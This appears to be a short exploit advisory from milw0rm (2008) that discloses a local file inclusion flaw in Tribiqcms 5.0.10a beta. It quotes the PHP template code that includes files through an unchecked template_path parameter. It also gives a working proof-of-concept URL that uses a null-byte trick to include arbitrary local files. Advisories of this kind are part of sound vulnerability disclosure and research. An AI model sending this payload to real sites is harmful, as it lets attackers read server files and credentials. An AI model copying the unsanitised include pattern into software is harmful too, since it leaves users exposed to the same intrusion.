34 lines
No EOL
1.3 KiB
Text
34 lines
No EOL
1.3 KiB
Text
_____ ____ __ __ _ ____ ____ ____
|
|
|_ _| | _ \ \ \ / / / \ / ___| / ___| / ___|
|
|
| | | |_) | \ V / / _ \ | | _ | | | |
|
|
| | | _ < | | / ___ \ | |_| | _ | |___ | |___
|
|
|_| |_| \_\ |_| /_/ \_\ \____| (_) \____| \____|
|
|
|
|
|
|
Tribiqcms 5.0.10a (beta) Local File Inclusion Vulnerability
|
|
|
|
Vuln Code In : /Community-5.0.10a/templates/mytribiqsite/tribal-GPL-1066/includes/header.inc.php
|
|
|
|
<div id="header">
|
|
<div id="logo"> <img src="templates/<?php echo $template_path;?>/images/logo.gif" alt="Company Name" /> </div>
|
|
<div id="language_selector">
|
|
<?php include "templates/".$template_path."/includes/language_box.inc.php";?> <--x
|
|
</div>
|
|
<div id="search_box">
|
|
<div id="searchbox_holder">
|
|
<?php include "templates/".$template_path."/includes/searchbox.inc.php";?><--x
|
|
</div>
|
|
</div>
|
|
</div>
|
|
|
|
POC :
|
|
/templates/mytribiqsite/tribal-GPL-1066/includes/header.inc.php?template_path=Local File %00
|
|
|
|
____ _ _ __ __
|
|
/ ___| ___ | | __| | | \/ |
|
|
| | _ / _ \ | | / _` | | |\/| |
|
|
| |_| | | (_) | | |___ | (_| | | | | |
|
|
\____| \___/ |_____| \__,_| _____ |_| |_|
|
|
|_____|
|
|
|
|
# milw0rm.com [2008-10-31] |